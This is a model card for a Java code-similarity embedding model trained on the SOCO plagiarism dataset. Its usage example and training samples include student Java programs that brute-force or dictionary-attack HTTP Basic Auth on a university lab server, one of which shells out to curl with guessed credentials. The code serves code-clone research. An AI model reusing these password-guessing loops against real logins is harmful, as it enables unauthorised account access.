SentenceTransformer based on microsoft/unixcoder-base-unimodal

This is a sentence-transformers model finetuned from microsoft/unixcoder-base-unimodal. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: microsoft/unixcoder-base-unimodal
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity

Model Sources

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-UniXcoder-ST")
# Run inference
sentences = [
    '\npublic class ImageFile\n{\n\tprivate String imageUrl;\n\tprivate int imageSize;\n\n\tpublic ImageFile(String url, int size)\n\t{\n\t\timageUrl=url;\n\t\timageSize=size;\n\t}\n\n\tpublic String getImageUrl()\n\t{\n\t\treturn imageUrl;\n\t}\n\n\tpublic int getImageSize()\n\t{\n\t\treturn imageSize;\n\t}\n}\n',
    'import java.io.*;\nimport java.net.*;\n\npublic class BruteForce {\n  public static void main(String[] args) {\n      BruteForce brute=new BruteForce();\n      brute.start();\n\n\n     }\n\n\npublic void start() {\nchar passwd[]= new char[3];\nString password;\nString username="";\nString auth_data;\nString server_res_code;\nString required_server_res_code="200";\nint cntr=0;\n\ntry {\n\nURL url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\nURLConnection conn=null;\n\n\n           for (int i=65;i<=122;i++)     {\n               if(i==91) { i=i+6; }\n               passwd[0]= (char) i;\n\n           for (int j=65;j<=122;j++)     {\n              if(j==91) { j=j+6; }\n              passwd[1]=(char) j;\n\n            for (int k=65;k<=122;k++)    {\n                if(k==91) { k=k+6; }\n                passwd[2]=(char) k;\n                password=new String(passwd);\n                password=password.trim();\n                auth_data=null;\n                auth_data=username + ":" + password;\n                auth_data=auth_data.trim();\n                auth_data=getBasicAuthData(auth_data);\n                auth_data=auth_data.trim();\n                conn=url.openConnection();\n                conn.setDoInput (true);\n                conn.setDoOutput(true);\n                conn.setRequestProperty("GET", "/SEC/2/ HTTP/1.1");\n                conn.setRequestProperty ("Authorization", auth_data);\n                server_res_code=conn.getHeaderField(0);\n                server_res_code=server_res_code.substring(9,12);\n                server_res_code.trim();\n                cntr++;\n                System.out.println(cntr + " . " + "PASSWORD SEND : " + password + "  SERVER RESPONSE  : " + server_res_code);\n                if( server_res_code.compareTo(required_server_res_code)==0 )\n                {System.out.println("PASSWORD IS :  " + password + "  SERVER RESPONSE  : " + server_res_code );\n                i=j=k=123;}\n                                           }\n\n                                        }\n\n                                    }\n        }\n     catch (Exception e) {\n           System.err.print(e);\n           }\n  }\n\npublic String getBasicAuthData (String getauthdata)    {\n\nchar base64Array [] = {\n      \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n      \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n      \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n      \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n      \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n      \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n      \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n      \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\' } ;\n\n    String encodedString = "";\n    byte bytes [] = getauthdata.getBytes ();\n    int i = 0;\n    int pad = 0;\n    while (i < bytes.length) {\n      byte b1 = bytes [i++];\n      byte b2;\n      byte b3;\n      if (i >= bytes.length) {\n         b2 = 0;\n         b3 = 0;\n         pad = 2;\n         }\n      else {\n         b2 = bytes [i++];\n         if (i >= bytes.length) {\n            b3 = 0;\n            pad = 1;\n            }\n         else\n            b3 = bytes [i++];\n         }\n      byte c1 = (byte)(b1 >> 2);\n      byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n      byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n      byte c4 = (byte)(b3 & 0x3f);\n      encodedString += base64Array [c1];\n      encodedString += base64Array [c2];\n      switch (pad) {\n        case 0:\n         encodedString += base64Array [c3];\n         encodedString += base64Array [c4];\n         break;\n        case 1:\n         encodedString += base64Array [c3];\n         encodedString += "=";\n         break;\n        case 2:\n         encodedString += "==";\n         break;\n       }\n      }\n      return " " + encodedString;\n  }\n}',
    'package java.httputils;\n\nimport java.io.IOException;\nimport java.net.MalformedURLException;\nimport java.sql.Timestamp;\n\n\npublic class RunnableBruteForce extends BruteForce implements Runnable\n{\n    protected int rangeStart, rangeEnd;\n    protected boolean stop = false;\n    \n    public RunnableBruteForce()\n    {\n        super();\n    }\n\n    \n    public void run()\n    {\n        process();\n    }\n\n    public static void main(String[] args)\n    {\n    }\n    \n    public int getRangeEnd()\n    {\n        return rangeEnd;\n    }\n\n    \n    public int getRangeStart()\n    {\n        return rangeStart;\n    }\n\n    \n    public void setRangeEnd(int i)\n    {\n        rangeEnd = i;\n    }\n\n    \n    public void setRangeStart(int i)\n    {\n        rangeStart = i;\n    }\n\n    \n    public boolean isStop()\n    {\n        return stop;\n    }\n\n    \n    public void setStop(boolean b)\n    {\n        stop = b;\n    }\n\n    public void process()\n    {\n        String password = "";\n        \n        System.out.println(Thread.currentThread().getName() +\n                            "->  workload: " +\n                            this.letters[getRangeStart()] + "  " +\n                            this.letters[getRangeEnd() - 1]);\n        setStart(new Timestamp(System.currentTimeMillis()));\n\n        for (int i = getRangeStart();\n            i < getRangeEnd();\n            i++)\n        {\n            System.out.println(Thread.currentThread().getName() +\n                    "-> Trying words beginning with: " +\n                    letters[i]);\n            for (int i2 = 0;\n                i2 < letters.length;\n                i2++)\n            {\n                for (int i3 = 0;\n                    i3 < letters.length;\n                    i3++)\n                {\n                    if (isStop())\n                    {\n                        return;\n                    }\n                    try\n                    {\n                        char [] arr = new char [] {letters[i], letters[i2], letters[i3]};\n                        String pwd = new String(arr);\n                        \n                        if (Thread.currentThread().getName().equals("Thread-1") && pwd.equals("bad"))\n                        {\n                            System.out.println(Thread.currentThread().getName() +\n                                   "-> Trying password: " +\n                                    pwd);\n                        }\n                        attempts++;\n\n                        BasicAuthHttpRequest req =\n                            new BasicAuthHttpRequest(\n                                getURL(),\n                                getUserName(),\n                                pwd);\n                        System.out.println("Got the password");\n                        setPassword(pwd);\n                        setEnd(new Timestamp(System.currentTimeMillis()));\n                        setContent(req.getContent().toString());\n\n                        \n                        this.setChanged();\n                        this.notifyObservers(this.getContent());\n                        return;\n                    }\n                    catch (MalformedURLException e)\n                    {\n                        e.printStackTrace();\n                        return;\n                    }\n                    catch (IOException e)\n                    {\n\n                    }\n                }\n            }\n        }\n\n        \n        setEnd(new Timestamp(System.currentTimeMillis()));\n    }\n\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]

Training Details

Training Dataset

Unnamed Dataset

  • Size: 33,411 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 1000 samples:
    sentence_0 sentence_1 label
    type string string int
    details
    • min: 51 tokens
    • mean: 449.02 tokens
    • max: 512 tokens
    • min: 51 tokens
    • mean: 464.04 tokens
    • max: 512 tokens
    • 0: ~99.80%
    • 1: ~0.20%
  • Samples:
    sentence_0 sentence_1 label





    import java.io.;
    import java.net.
    ;



    public class BruteForce
    {
    public static void main(String args[]) throws IOException,
    MalformedURLException
    {
    final String username = "";
    final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";

    String temppass;
    String password = "";
    URL url = new URL(fullurl);
    boolean cracked = false;

    String c[] = {"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O",
    "P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d",
    "e","f","g","h","i","j","k","l","m","n","o","p","q","r","s",
    "t","u","v","w","x","y","z"};

    startTime = System.currentTimeMillis();



    for(int i = 0; i < 52 && !cracked; i++) {
    temppass = c[i];
    Authenticator.setDefault(new MyAuthenticator(username, temppass));
    try{


    BufferedReader r = ...


    import java.net.;
    import java.io.
    ;

    public class SendEMail {

    public void SendEMail(){}

    public void sendMail(String recipient,String c, String subject){
    try {

    Socket s = new Socket("yallara.cs.rmit.edu.", 25);
    BufferedReader in = new BufferedReader
    (new InputStreamReader(s.getInputStream(), "8859_1"));
    BufferedWriter out = new BufferedWriter
    (new OutputStreamWriter(s.getOutputStream(), "8859_1"));

    send(in, out, "HELO theWorld");


    send(in, out, "MAIL FROM: ");
    send(in, out, "RCPT : "+recipient);
    send(in, out, "DATA");
    send(out, "Subject: "+ subject);
    send(out, "From: WatchDog.java");
    send (out, "\n");

    BufferedReader reader;
    String line;
    reader = new BufferedReader(new InputStreamReader(new FileInputStream()));
    line = reader.readLine();
    while (line != null){
    send(out, line);
    line = reader.readLine();
    }
    send...
    0
    import java.util.;
    import java.net.
    ;
    import java.io.*;

    public class Dictionary
    {
    boolean connected = false;
    int counter;

    Vector words = new Vector();

    Dictionary()
    {
    counter = 0;
    this.readWords();
    this.startAttack();
    }

    public void startAttack()
    {
    while(counter {
    connected = sendRequest();
    if(connected == true)
    {
    System.out.print("The password is: ");
    System.out.println((String)words.elementAt(counter-1));
    counter = words.size();
    }
    }
    }


    public void readWords()
    {
    String line;

    try
    {
    BufferedReader buffer = new BufferedReader(
    new FileReader("/usr/share/lib/dict/words"));

    line = buffer.readLine();

    while(line != null)
    {

    if(line.length() <= 3)
    ...































    import java.io.;
    import java.net.
    ;
    import java.net.URL;
    import java.net.URLConnection;
    import java.util.*;

    public class BruteForce {

    public static void main(String[] args) throws IOException {


    int start , end, total;
    start = System.currentTimeMillis();

    String username = "";
    String password = null;
    String host = "http://sec-crack.cs.rmit.edu./SEC/2/";



    String letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int lettersLen = letters.length();
    int passwordLen=3;

    int passwords=0;
    int twoChar=0;

    url.misc.BASE64Encoder base = new url.misc.BASE64Encoder();



    String authenticate = "";
    String realm = null, domain = null, hostname = null;
    header = null;


    int responseCode;
    String responseMsg;


    int temp1=0;
    int temp2=0;
    int temp3=0;





    for (int a=...
    0




    public class SMTPException extends Exception {

    private String msg;

    public SMTPException(String message) {
    msg = message;
    }


    public String getMessage() {
    return msg;
    }
    }


    import java.net.;
    import java.io.
    ;

    import java.;
    import java.util.
    ;

    public class Dictionary {

    private static String commandLine = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
    private String password;
    private String previous;
    private String url;
    private int startTime;
    private int endTime;
    private int totalTime;
    private float averageTime;
    private boolean finish;
    private Process curl;
    private BufferedReader bf, responseLine;

    public Dictionary() {

    first();
    finish = true;
    previous = "";
    Runtime run = Runtime.getRuntime();
    startTime =new Date().getTime();
    int i=0;
    try {
    try {
    bf = new BufferedReader(new FileReader("words"));
    }
    catch(FileNotFoundException notFound) {
    bf = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));
    }

    while((password = bf.readLine()) != null) {
    if(password....
    0
  • Loss: BatchAllTripletLoss

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • num_train_epochs: 1
  • fp16: True
  • multi_dataset_batch_sampler: round_robin

All Hyperparameters

Click to expand
  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin

Training Logs

Epoch Step Training Loss
0.2393 500 0.2443
0.4787 1000 0.2228
0.7180 1500 0.2148
0.9574 2000 0.1666

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 3.6.0
  • Tokenizers: 0.21.1

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}

BatchAllTripletLoss

@misc{hermans2017defense,
    title={In Defense of the Triplet Loss for Person Re-Identification},
    author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
    year={2017},
    eprint={1703.07737},
    archivePrefix={arXiv},
    primaryClass={cs.CV}
}
Downloads last month
7
Safetensors
Model size
125M params
Tensor type
F32
·
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for buelfhood/SOCO-Java-UniXcoder-ST

Finetuned
(7)
this model